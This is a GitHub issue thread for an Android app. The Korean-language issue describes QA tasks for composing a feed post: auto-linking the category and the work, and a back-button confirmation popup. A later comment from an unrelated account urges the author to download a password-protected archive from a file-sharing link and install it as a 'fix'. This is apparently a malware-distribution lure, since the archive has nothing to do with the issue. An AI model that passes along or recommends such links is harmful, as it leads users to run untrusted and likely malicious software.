### ISSUE TITLE
feat: 피드작성 1차 QA 대응

### ISSUE THREAD

**Issue by s9hn** [Team-WSS/WSS-Android#298]
## 📜 Overview (Required)    
  
- 피드 작성 시, 카테고리 및 작품 자동 연결 구현
- 게시글 작성 중 뒤로가기 시 팝업 등장 구현

## 📌 Child Issue(Optional)  

No response  

## 📍 Note (Optional) 
No response

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
